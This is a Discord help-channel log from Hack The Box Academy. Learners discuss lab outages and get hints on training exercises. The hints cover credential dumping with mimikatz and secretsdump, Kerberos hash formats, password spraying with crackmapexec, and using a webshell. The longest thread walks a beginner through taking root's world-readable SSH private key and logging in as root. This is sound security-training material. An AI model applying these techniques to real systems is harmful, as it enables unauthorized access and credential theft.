okay I will do that
flat niche
Could anyone give me some hints on ad assessment part 1? I'm looking for the other user with a clear text password.
short hare
primal mesa
anyone else doing Windows Priv Esc modules and unable to spawn target?
cedar void
I know that I use tools like secretydump.py to extract the hashes from the ndts.dit database...but right now I am having trouble downloading/copying the ndts.dit database to the attacking machine.
vssadmin won't work since thats only available on windows server machines from what I have learned
short hare
anyone else doing Windows Priv Esc modules and unable to spawn target?
Yesterday I faced same problem in web attacks
Got fixed after few hours
short hare
Could anyone give me some hints on ad assessment part 1? I'm looking for the oth...
How much have you progressed to that?
cedar void
Is there an easier way to copy a hash value into notepad?
"Hashfile 'ilfreight_asrep' on line 1 ($krb5t...4B024C372D9E07319F47341B871F718C): Signature unmatched
No hashes loaded.
"
narrow nebula
Correct me if im wrong guys, But arent source ports above the 49k range?
plain coral
Is there an easier way to copy a hash value into notepad?
"Hashfile 'ilfreight...
iirc, Rubeus has a -Format option that you can use to directly output Kerberos tickets in a format compatible with hashcat
plain coral
Could anyone give me some hints on ad assessment part 1? I'm looking for the oth...
Use mimikatz
narrow nebula
Is there any quicker way to do a scan of all ports -p- an ETA was a few hours, however my power box m(VPN) only has 2 hours of life per day and I need to find a source port for the particular section I am on. Any suggestions?
When I do -F it only has 2 ports 22/80. It seems I may need some sort of source port in order to do the NCat Command.
limber river
still facing connecting problems with labs ...
limber river
Target is spawning for ever
I switch to another server , it looks fine now
midnight galleon
I switch to another server , it looks fine now
How do u switch targets server?
limber river
How do u switch targets server?
you will find it before the question of the section
midnight galleon
Pwnbox works fine, but targets won't spawn
next bronze
When I do -F it only has 2 ports 22/80. It seems I may need some sort of source ...
-F scans the top 100 ports, -p- scans all ports, I'm sure there's a balance between that 
midnight galleon
you will find it before the question of the section
That is the pwnbox servers
next bronze
switch vpn server
midnight galleon
I don't even use vpn I use pwnbox
limber river
I don't even use vpn I use pwnbox
well switch pwnbox vpn
midnight galleon
Still, target is spawning
What is even the relationship between spawning the target and the Pwnbox anyway
next bronze
your vpn sets where the target server, pwnbox automatically switches the vpn
halcyon sphinx
Hi. Iβm working on Broken Authentication Assessment and Iβm stuck. I have the credentials for the support user and the corresponding cookie. Iβve decoded part of the cookie but canβt decode the other part. Iβve tried tampering with the part of the cookie I can control and set it to admin but that failed to give admin rights. I donβt know what to do. Could someone give me a hint?
red kraken
I am doing the nmap room in htb academy and for some reason my nmap scans wont go through any suggestions?
red kraken
And the target spawning is also very slow any tips to make it faster?
dapper current
And the target spawning is also very slow any tips to make it faster?
There is an issues since yesterday with the target spawning
snow ridge
@red kraken Not really, I have tried many things but the problem is on their servers so we can't really do anything. Hopefully they'll fix this tomorrow
red kraken
There is an issues since yesterday with the target spawning
thanks
red kraken
<@750988561272143923> Not really, I have tried many things but the problem is on...
got it thanks yeah hopefully they fix it
tight blade
guys i wanna learn hacking can someone teach me π¦
hallow kiln
guys i wanna learn hacking can someone teach me π¦
Get on HTB Academy and start learning
silent oriole
Hi Team, unable to start the target. stuck at Target spawning. Any suggestion?
fading ridge
Same
snow ridge
@silent oriole No, I have tried many things but the problem is on their servers so we can't really do anything. Hopefully they'll fix this tomorrow.
silent oriole
<@657536447804473365> No, I have tried many things but the problem is on their s...
Hopefully. Thanks mate.
limber river
guys i wanna learn hacking can someone teach me π¦
just start
dense pewter
Hi Team, unable to start the target. stuck at Target spawning. Any suggestion?
Same here. I've tried changing my VPN location, clearing browser cache and I've contacted support. So far no response.
I've gotten a response:
Hello there,
We are currently experiencing intermittent issues with spawning that is affecting all platforms. In cases where it is possible, switching your VPN region may help, but otherwise please be advised we are working to resolve this issue as quickly as possible.
Please check back on Monday as we expect the issue to have been resolved by then. If it still persists, please feel free to reach back out.
decode the cookie
winged elm
Hi Team, unable to start the target. stuck at Target spawning. Any suggestion?
you still have the issue? I have it as well
brisk viper
you still have the issue? I have it as well
same here
silent oriole
Same here. I've tried changing my VPN location, clearing browser cache and I've ...
Fair enough. Thanks.
languid wharf
you still have the issue? I have it as well
It started yesterday, and hopefully be fixed by tomorrow
winged elm
It started yesterday, and hopefully be fixed by tomorrow
Kinda feel bad for them lol
languid wharf
lol
silver iris
I have a dumb question about the "Active Directory Enumeration & Attacks".
I started the enumeration and was looking for records on inlanefreight.com, but couldnt find anything. I remembered from a previos DNS module, that i found a flag, that the module didnt accept at the time. But i wrote the command and response down and still had the flag in my notes. So i just tried to dubmit it and it was correct. Today however when using the same command, i dont get the flag as the aswer.
i just used "dig any inlanefreight.com". Any ideas why its not working this time?
fathom pendant
I have a dumb question about the "Active Directory Enumeration & Attacks".
I sta...
silver iris
Because the module asks for it.
fathom pendant
Inlanefreight.com isn't a part of ad enum? AFAIK maybe inlanefreight.htb
silver iris
No 100% .com in the question
fathom pendant
What section?
silver iris
External Recon and Enumeration Principles
I remember in the previous module i did it wrong by using the wrong domain, but this time it asks for .com not .htb
languid wharf
not .local?
silver iris
"While looking at inlanefreights public records; A flag can be seen. Find the flag and submit it. ( format == HTB{******} ) "
Or am i stupid now? π
But with .com i got the flag like a week ago
I still have the output in my notes
kindred shard
you still have the issue? I have it as well
Have you tried changing server location for your vpn
fathom pendant
Or am i stupid now? π
Read the last paragraph of that section
But yeah that's weird
It does say inlanefreight.com
But any is a query that may not return anything
silver iris
I know, but iΒ΄m still curios why it worked a week ago and now it doesnt. Because the flag from a week ago from .com was accepted as correct answer π
languid wharf
"While looking at inlanefreights public records; A flag can be seen. Find the fl...
what command did you use?
kindred shard
Read the last paragraph of that section
inlanefreight is on htb servers i guess
languid wharf
inlanefreight is on htb servers i guess
the .com domain isn't
silver iris
But any is a query that may not return anything
Ah ok, that might be it
fathom pendant
Bro the flag is right there
languid wharf
Bro the flag is right there
yeah lol
silver iris
Bro the flag is right there
I know, i have the flag and submitted it
thats not my question
kindred shard
the .com domain isn't
hih lol
silver iris
my question is, why it worked a week ago and now it dont
fathom pendant
Delete this btw
languid wharf
my question is, why it worked a week ago and now it dont
It does
I just ran it lol
ruby whale
What is the use of --local auth in crackmapexec ?
In AD module (Internal Password Spraying - from Linux) it is given as The --local-auth flag will tell the tool only to attempt to log in one time on each machine which removes any risk of account lockout. Make sure this flag is set so we don't potentially lock out the built-in administrator for the domain
What if the host is not domain joined? Could someone please explain in detail about this?
languid wharf
Try to specify a known dns server, remember that this domain isn't on the htb servers but a public one.
You can also view the records of this domain using BGP Toolkit becauase it's a public domain
winged elm
Have you tried changing server location for your vpn
nah, went to do the OSCP labs
silver iris
Sorry got it now. Deactivted my personal VPN and now it worked. Sorry for the confusion π
At least i can see that notes are valuable
tepid path
Good evening everyone and happy new year I would like to know if it is possible to give cubes to another user on HTB Academy
fathom pendant
No
ruby whale
Hey everyone, is this the right platform to ask doubts or should I use the HTB forum ?
fathom pendant
Hey everyone, is this the right platform to ask doubts or should I use the HTB f...
Doubts about? (Also the proper word is question)
ruby whale
Doubts about? (Also the proper word is question)
Yup question is the right word. Question about concepts learnt in the modules.
wild oriole
Guys, in CROSS-SITE SCRIPTING (XSS) - Phishing module
When I click on spawn the target button, it's going to loading for ever
Faced the same issue?
fathom pendant
Yup question is the right word. Question about concepts learnt in the modules.
It just depends on the question
fathom pendant
Guys, in CROSS-SITE SCRIPTING (XSS) - Phishing module
When I click on spawn the...
Everybody is facing spawning issues
ruby whale
What is the use of `--local auth` in `crackmapexec` ?
In AD module (Internal Pas...
Like this for example
wild oriole
Everybody is facing spawning issues
Only this module - section, all rest are fine
next bronze
Like this for example
local account vs domain account
wild oriole
Any idea how to address it?
fathom pendant
Like this for example
It tells cme that you're asking it to authenticate on a local account, not a domain account.
fathom pendant
Any idea how to address it?
Change vpn region?
ruby whale
local account vs domain account
Oh got it . Thanks
wild oriole
Change vpn region?
I did not lunch the VPN yet,
fathom pendant
I did not lunch the VPN yet,
OK? That's somewhat not what I'm meaning
The vpn region dictates where the target spawns
Meaning changing it updates where it should spawn, you'd just need to download a new vpn file
wild oriole
Got you, let me have a try
hallow kiln
Can't even imagine what support is gonna come back to Monday lol
sonic glacier
stuck on this question, not sure if I need to crack the password or if I did crack it in other modules : Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.
flat niche
How much have you progressed to that?
I've used mimikatz to get the NTML and SHA1 hash but I cannot crack them. I've also tried Snaffler and LaZagne but none of them can give me the cleartext password
flat niche
Use mimikatz
I've used mimikatz but I can only get the uncrackable hashes
next bronze
I've used mimikatz but I can only get the uncrackable hashes
there's a cleartext password there, look closer
flat niche
You mean with mimikatz?
next bronze
yep
flat niche
I'm using sekurlsa::logonPasswords
next bronze
if it's windows you can mount a drive with xfreerdp https://www.mankier.com/1/xfreerdp
flat niche
Is this the right way?
flat niche
I'm using sekurlsa::logonPasswords
I couldn't find the clearpassword in the output of this. Should I look closer the output or I should do something else?
next bronze
I don't remember which option it is, but it's in there somewhere
flat niche
Thank you so much! I will dig deeper with mimikatz
next bronze
why not?
fathom pendant
If you mount a drive: it's super easy
wild oriole
OK? That's somewhat not what I'm meaning
Seems working, thanks!
next bronze
check the link I sent, mount the drive, and you will see a network drive when you open my computer
frozen stone
Hello, everyone. Could you please assist me with the "Injection Attacks" assessment?
alpine ridge
Anyone else having trouble spawning the academy machines?
narrow nebula
-F scans the top 100 ports, -p- scans all ports, I'm sure there's a balance betw...
-f doesnβt seem to get any source ports, I only get the 2 ports in return (22/80) and I believe I need a source port to connect to, in order to receive the version of the service the target is running, so I been trying -p- to scan all, however that can take hours. Any suggestions on how I can speed that process up?
next bronze
the default scan is top 1000 ports, which should be enough most of the time, if you need to scan all ports, use a timing template or set the min rate, the nmap module also goes through this
https://nmap.org/book/man-performance.html
https://nmap.org/book/performance-timing-templates.html
narrow nebula
the default scan is top 1000 ports, which should be enough most of the time, if ...
Got it thank you!
hollow lake
Anyone else having trouble spawning the academy machines?
yes, sometimes
midnight galleon
In the password attacks module, network services section, is there a way to make crackmapexec only enumerate usernames then passwords or am I stuck with this usernames_wordlist.length Γ password_wordlist.length number of connections?
Msfconsole also seems to be using the same n Γ m instead of n + m
next bronze
In the password attacks module, network services section, is there a way to make...
what do you want it to do? try first user with the first pass, second user with the second pass etc?
midnight galleon
No
Try all users with one pass
And if one user exist on the system but that pass was wrong it would still alert
next bronze
Try all users with one pass
then just give it one pass?
midnight galleon
It will prompt the same output even if the user exist
next bronze
I'm not sure what you're trying to say here, send a screenshot maybe
hollow lake
you mean like the -u flag in Hydra for example (https://academy.hackthebox.com/module/57/section/487). I don't know if it's possible in crackmapexec. I quickly checked the documentation and I didn't find it
rich light
I am doing the ADCS module, but cannot seem to spawn the lab
Is there some stability issue currently?
hollow lake
I am doing the ADCS module, but cannot seem to spawn the lab
there are some problems spawning labs today. I managed to do it after some retries and waiting some time.
rich light
there are some problems spawning labs today. I managed to do it after some retri...
Ah, thanks. That is too bad
astral inlet
same prob here
rich light
Even when the box spawns, then I cannot connect to the machine π
astral inlet
works now for me
civic dawn
works sometime, but if it works i can also connect π
steel grail
hi everyone
zealous raptor
anyone know how i can get my hackthebox account to show my progress on github, just for employment purposes
cedar forum
is there a chat where i can ask for help to try to solve a skill check on a module?
next bronze
anyone know how i can get my hackthebox account to show my progress on github, j...
offtopic there are htb badges you can include as a js snippet
Simply include the following snippet to the location of the web page you want the badge on!
<script src="https://www.hackthebox.eu/badge/<userid>"></script>
If you need a static image link of the badge you can use the following snippet:
<img src="http://www.hackthebox.eu/badge/image/<userid>" alt="Hack The Box">
zealous raptor
offtopic there are htb badges you can include as a js snippet
Simply include th...
thanks, where is a channel related to this?
steel grail
hey i am doing an academy module, "getting started". I am at the section where i have to escalate my privalages to get to the root user, i am at user 2 which is the step required before and am kinda stuck
next bronze
hey i am doing an academy module, "getting started". I am at the section where i...
check hidden directories where you might find some keys
steel grail
which command?
I need a password or something i think for user 2. im not sure
i was able to manage the first one.. should getting into root be similar to user 2?
next bronze
nope, use the hint that I gave
cedar forum
im stuck on the same module xD but a few sections behind that
steel grail
im stuck on the same module xD but a few sections behind that
holler if you need help
cedar forum
im doing the metasploit exercise, but im having trouble setting the options
cedar forum
already did xD
steel grail
nope, use the hint that I gave
i already got the flag for user 2 im trying to get the root user access to get that flag
next bronze
I know, look for hidden directories where you might find some keys for root
next bronze
read the past part of that section
fluid basin
Attacking common services lab-easy, I have uploaded the webshell but cannot do anything with it besides listing files. can sombody point me in the right direction please?
steel grail
read the past part of that section
hmmm
steel grail
read the past part of that section
ok i see that. just a little conused how i use that key.. it doesnt seem to let me
next bronze
did you chmod?
next bronze
Attacking common services lab-easy, I have uploaded the webshell but cannot do a...
url encode your commands
steel grail
did you chmod?
oh with the public key?
next bronze
nope, use the private key, chmod it, then -i to use
next bronze
you need to copy it from the terminal, write it to your system (with vim or nano, whichever you like), chmod it, then -i to use
next bronze
vim is not a flag, it's a text editor, same as nano, when you use vim fileName it opens a new file fileName for you to write to
steel grail
or do i use vim id_rsa like the example?
next bronze
yes
steel grail
why would i not vim the key?
next bronze
what do you mean?
next bronze
are you using that in the ssh session?
steel grail
i think so
next bronze
2 things here: user2 is your current user, getting the key for that user wouldn't get you to root. find another key elsewhere that will
if the key exists in the target, can you use it? create the file in your own system, then ssh in
steel grail
i know the user 2 wont get me to root...
err flag i mean
ok so another key...
would gobuster be beneficial?
next bronze
no. where would the key for root be located?
steel grail
in user 2?
or even in the root user
but i cant get access to the root user
something about not knowing the password for user 2
next bronze
look up where is root's home dir
steel grail
Therefore, the home directory for the root user is in the path of /root.
is what i got
cedar void
So are any of you going to tryhackme until the spawn machines at HTB work again?
next bronze
Therefore, the home directory for the root user is in the path of /root.
found the key that you need?
fathom pendant
So are any of you going to tryhackme until the spawn machines at HTB work again?
working fine for me on US academy 3
verbal tree
should i take notes about the fundamental modules?
cloud bone
not working at all here EU academy 1
cedar void
I take notes on all my modules
steel grail
found the key that you need?
no...
next bronze
combine the information you have, you know root's home dir, you know where the keys are usually located
steel grail
yes i understand that but i cant access root unless i am logged in as root
im back at user 1 level
next bronze
get to user2
fathom pendant
should i take notes about the fundamental modules?
taking notes is key to success
astral inlet
damn target is not spawning
fathom pendant
yes i understand that but i cant access root unless i am logged in as root
user2 can access things that they otherwise shouldn't
steel grail
get to user2
ok ill go back to user 2
fathom pendant
things hide in the /root/
steel grail
user2 can access things that they otherwise shouldn't
weird. i was having trouble accessing root even as user 2
fathom pendant
yes accessing specifically root however some things that are hidden can be seen
astral inlet
are you still taking about academy ?
fathom pendant
are you still taking about academy ?
yes
hidden directories are crucial to finding information
steel grail
get to user2
ok so im back at user2 but it wont let me use the hidden directory command again
fathom pendant
ok so im back at user2 but it wont let me use the hidden directory command again
hidden directory command?
ls -la?
astral inlet
you can do alias ls ="ls -la" saves lifes π
fathom pendant
you can do alias ls ="ls -la" saves lifes π
Β―_(γ)_/Β―
it's not hard to remember
steel grail
ah
fathom pendant
by default it's the current directory
steel grail
i understand that. still only gives me the original flag
fathom pendant
no; it doesn't
steel grail
well it did
fathom pendant
ls -la /root/ should list all files/directories in /root/
steel grail
ill send a screen shot
fathom pendant
there may be another file called flag.txt in the root dir
steel grail
yes
fathom pendant
but it's not the same
fathom pendant
steel grail
i guess i need to chmod but im still confused on how to do thatr
fathom pendant
you don't need to chmod anything to do with flags
steel grail
it says i need to escalate my privalages to root
fathom pendant
indeed you do
steel grail
thats what ive been asking
fathom pendant
there's a hidden directory in /root/
steel grail
O_O
cedar void
US academy 3 also works for me as a spawn machine
next bronze
thats what ive been asking
that's what we've been trying to guide you to
fathom pendant
thats what ive been asking
we're leading you to the answer and having you put the pieces together yourself
steel grail
we're leading you to the answer and having you put the pieces together yourself
i understand im just very confused
the hint says to chmod..
steel grail
i know that
fathom pendant
chmod [perms] file
but that's beside the point
unless you find the file it's all moot
bc you need to copy that file to your attack system
steel grail
its the key file
i got to that point and then i got into chmod and my whole thing messed up so i had to start over
fathom pendant
begins with -----BEGIN
steel grail
yes mam
fathom pendant
i got to that point and then i got into chmod and my whole thing messed up so i ...
if you have the key copied over to your attack system then you can start from there
fathom pendant
bc if you just try to ssh with that file you'll get an error saying something like "permissions too broad" or something like that
user|group|others
1 = x(execute)
2 = w(write)
4 = r(read)
next bronze
might be a bit of an overload to introduce octal perms now
fathom pendant
you can add the numbers together to get perms
rw------- = 600
rw-rw---- =660
rw-rw-rw- = 666
i mean chmod also has a manual entry Β―_(γ)_/Β―
that can be easily be referenced
fathom pendant
might be a bit of an overload to introduce octal perms now <:kekhands:9739963423...
the article i linked goes over the simpler chmod u/g/o/a+perm format
next bronze
fair
fathom pendant
imo the octal format is much better but that's jsut because it's easier for me to parse
777 = "why do you need everybody to use this???"
steel grail
fathom pendant
you don't need to use keygen
steel grail
ok well im back into user 2
fathom pendant
the ssh key already exists for root
(and keygen only creates the key for your user)
ls -la /root/ and look for a hidden directory that might hold the key
fathom pendant
look at the output of
ls -la /root/
you will see there's more there than just flag.txt
steel grail
yes
fathom pendant
what folder do YOU think has what you're looking for
think: what protocol did you use to connect as user1
steel grail
ssh
fathom pendant
yes
now connect the dots
ls -la /root/[hidden directory] (replace [hidden directory] with the hidden directory you found)
in pretty much most filesystems a . indicates a hidden directory
not visible unless you specify you're looking for all
so /root/.whatever
steel grail
i did
fathom pendant
so you should see a file there; and it's interesting the perms on it
steel grail
all i see is flag.txt
fathom pendant
and we're back at square -1
astral inlet
show your output please
fathom pendant
Getting Started Knowledge check yeah?
steel grail
theres something getting lost in translationb between us
next bronze
show your output
steel grail
fathom pendant
ls -la is one command
steel grail
ohhhh
fathom pendant
-la is flags for ls
steel grail
rw------- 1 user2 user2 38 Feb 12 2021 flag.txt
-rw------- 1 user2 user2 2667 Jan 21 18:27 key
-rw-r--r-- 1 user2 user2 614 Jan 21 18:27 key.pub
astral inlet
man ls
fathom pendant
astral inlet
i suggest to take the linux beginners course ... no offense
steel grail
drwxr-x--- 1 root user2 4096 Feb 12 2021 .
drwxr-xr-x 1 root root 4096 Jan 21 17:53 ..
-rwxr-x--- 1 root user2 5 Aug 19 2020 .bash_history
-rwxr-x--- 1 root user2 3106 Dec 5 2019 .bashrc
-rwxr-x--- 1 root user2 161 Dec 5 2019 .profile
drwxr-x--- 1 root user2 4096 Feb 12 2021 .ssh
-rwxr-x--- 1 root user2 1309 Aug 19 2020 .viminfo
-rw------- 1 root root 33 Feb 12 2021 flag.txt
fathom pendant
drwxr-x--- 1 root user2 4096 Feb 12 2021 .
drwxr-xr-x 1 root root 4096 Jan 21 ...
man this sure does look interesting now doesn't it
steel grail
i suggest to take the linux beginners course ... no offense
no offense taken
steel grail
man this sure does look interesting now doesn't it
it does!
fathom pendant
ls -la /root/[hidden directory]
fathom pendant
I got hit in the head a lot as a kid
hit in the head, ask your mother to apologize for dropping you too 
(at least you're picking it up though)
steel grail
ok so i see that, but i cannot cat the file without the right permisions
fathom pendant
yes, you can't cat flag.txt
astral inlet
maybe because you haver to login as root
fathom pendant
but you can cat something else
next bronze
maybe because you haver to login as root
no
steel grail
maybe the profile lol
fathom pendant
maybe the profile lol
back to square -1
think again about the protocol you're using
astral inlet
look @ hidden dir
next bronze
connect the dots, where would the key be located at?
fathom pendant
[yes i know everything in linux is a file]
steel grail
im using ssh but .ssh is directory
steel grail
drwxr-x--- 1 root user2 4096 Feb 12 2021 .
drwxr-x--- 1 root user2 4096 Feb 12 2021 ..
-rw------- 1 root root 571 Feb 12 2021 authorized_keys
-rw-r--r-- 1 root root 2602 Feb 12 2021 id_rsa
-rw-r--r-- 1 root root 571 Feb 12 2021 id_rsa.pub
astral inlet
great
fathom pendant
drwxr-x--- 1 root user2 4096 Feb 12 2021 .
drwxr-x--- 1 root user2 4096 Feb 12 ...
ooh man i wonder what one of those could be useful
astral inlet
me me me
steel grail
authorized keys!!!
fathom pendant
incorrect
steel grail
one of the other two then lmao
fathom pendant
authorized keys are for another purpose
cedar void
For this module, are we supposed to know the password of the user wley from a past module section?
astral inlet
look at your permissions
fathom pendant
look at your permissions
644 is crazy
steel grail
look at your permissions
i cant i dont know user 2 password
next bronze
For this module, are we supposed to know the password of the user wley from a pa...
yes, also you can specify the password in your command user:pass
fathom pendant
i cant i dont know user 2 password
permissions in this case refers to the file permissions
the rw-|r--|r-- perms
in fact why does the id file have global read 
steel grail
it has root permissions
astral inlet
because the admin is dumb π
fathom pendant
it has root permissions
doesn't matter
user|group|others
the key part here is the others
user/group should have read/read-write permissions
but not others (as in all other users)
steel grail
cat /root/.ssh/id_rsa
?
astral inlet
why donΒ΄t you look into your own .ssh folder and see what is there ?
fathom pendant
cat /root/.ssh/id_rsa
?
bingo
next bronze
fathom pendant
cat /root/.ssh/id_rsa
?
also in future; don't ask for confirmation before doing
just do it and if it fails, come back and ask
cedar void
yes, also you can specify the password in your command `user:pass`
I am not sure what you mean. tried adding wley:pass to that command .
late surge
ΰ€ΰ€ ΰ€¬ΰ₯ΰ€¨ ΰ€ΰ₯ΰ€ΰ€²
fathom pendant
ok so massive line of text.. its a key
you'll need to copy/paste
astral inlet
yes its the private key
late surge
um hi\
fathom pendant
ΰ€ΰ€ ΰ€¬ΰ₯ΰ€¨ ΰ€ΰ₯ΰ€ΰ€²
english only
late surge
sorry
next bronze
I am not sure what you mean. tried adding wley:pass to that command .
well you will need to give it the actual password
late surge
live class dutch
cedar void
well you will need to give it the actual password
I don't know the actual password and didn't see it in the module. That is why I asked was it a password that we use from a past module ?
fathom pendant
<@&861185840277487616>
late surge
ok
next bronze
I don't know the actual password and didn't see it in the module. That is why I ...
I said yes in my previous reply
fathom pendant
^
fathom pendant
I don't know the actual password and didn't see it in the module. That is why I ...
these modules reuse creds a lot in their sections
cedar void
I said yes in my previous reply
oh okay I see now
fathom pendant
I said yes in my previous reply
you don't need to refer to a previous modules for creds btw that would defeat the purpose of them being self-contained
if you need to attain creds; then the module has/or gave you a way within the scope of it to attain them
languid dawn
this isn't the discord for that @late surge
next bronze
you don't need to refer to a previous modules for creds btw that would defeat th...
previous section, not module yeah
late surge
ok
fathom pendant
previous section, not module yeah
important distinction :D
as much as i hate pedantry this is important
late surge
so telnet{user ip}
fathom pendant
so telnet{user ip}
what?
this channel is specifically for https://academy.hackthebox.com/ modules
if you don't know what HTB is then please read #welcome ; if you've read welcome and realize this server isn't for you - Goodbye
late surge
i can hack you in 3 min
fathom pendant
i can hack you in 3 min
sure kid
next bronze
damn that's crazy
steel grail
ok so i have the private key...
urban sage
...
fathom pendant
ok so i have the private key...
you now just need to set chmod your key to the right perms
fathom pendant
give me the ip
127.0.0.1
steel grail
you cant even hack with just an ip lol
fathom pendant
you cant even hack with just an ip lol
i mean you can
that's kinda how hacking works
you start with an exposed service on an ip; and work from there
steel grail
i mean yea
next bronze
you cant even hack with just an ip lol
let me introduce you to the hackthebox platform, where you are only given a single ip
fathom pendant
let me introduce you to the hackthebox platform, where you are only given a sing...
sometimes public, sometimes private (labs and challenges)
@steel grail i linked an article earlier about linux file permissions, and did a brief explanation of octal permissions btw
but in short you want to make sure only the user/group has read/read-write permissions
steel grail
chmod /root/.ssh/id_rsa
fathom pendant
nope
you can't chmod it as you aren't the owner
as I said earlier you gotta copy/paste it
also it's chmod [permissions] file
astral inlet
id_rsa needs 6xx
fathom pendant
but if you copy it to your attack box you can easily just do it from there
fathom pendant
think about what to do with the id_rsa file,
they need to have it be mutable first
so they need to make a copy for themselves
steel grail
hmod 600 /root/.ssh/id_rsa
chmod: changing permissions of '/root/.ssh/id_rsa': Operation not permitted
fathom pendant
hmod 600 /root/.ssh/id_rsa
chmod: changing permissions of '/root/.ssh/id_rsa': ...
ok you aren't listening
astral inlet
maybe wrong machine ?
steel grail
i copied and pasted the key
fathom pendant
you need to copy/paste the contents of the file to your own machine
fathom pendant
i copied and pasted the key
then you just chmod that file
so you cat the id_rsa file -> select all -> copy -> paste into a text editor on your attack machine -> save -> chmod [permissions] file
you can't change the id_rsa that exists in /root/ bc it's owned by root
steel grail
its in a plaintext editor on my VM
rustic sage
you *can't* change the id_rsa that exists in /root/ bc it's owned by `root`
But what if you login as root, won't it work?
astral inlet
guess what we wanna do with the id_rsa π
steel grail
or is it vim /root/.ssh/id_rsa
next bronze
its in a plaintext editor on my VM
you need to copy from
-----BEGIN OPENSSH PRIVATE KEY----- to -----END OPENSSH PRIVATE KEY-----
steel grail
i sure did
fathom pendant
i sure did
it doesn't matter what you save the filename as
or what editor you used
steel grail
i know
fathom pendant
now how do you use id files with ssh?
steel grail
its on my desktop as plaintext.txt
fathom pendant
Getting Started - Privelege Escalation
astral inlet
no good start tbh
fathom pendant
literally just ran through this on my machine and it works
at this point it's literally just user error Β―_(γ)_/Β―
astral inlet
layer 8 yes
steel grail
I know it works im just stuck on what i do with the key
astral inlet
ssh -i
steel grail
its on my desktop
astral inlet
later
steel grail
in a plaintext file
lusty thicket
in a plaintext file
youβll figure it out
astral inlet
i do the pentester path to do CTSP later , i suggest to take the basic modules
if you miss basics you will get very frustrated
steel grail
yall tell to me to chmod it but i cant
astral inlet
easy
steel grail
if you miss basics you will get very frustrated
i thought this was basic
fathom pendant
in a plaintext file
just use -i /path/to/plaintext.txt
tbf this is relatively basic usage of tools
astral inlet
https://academy.hackthebox.com/modules -> fundamentals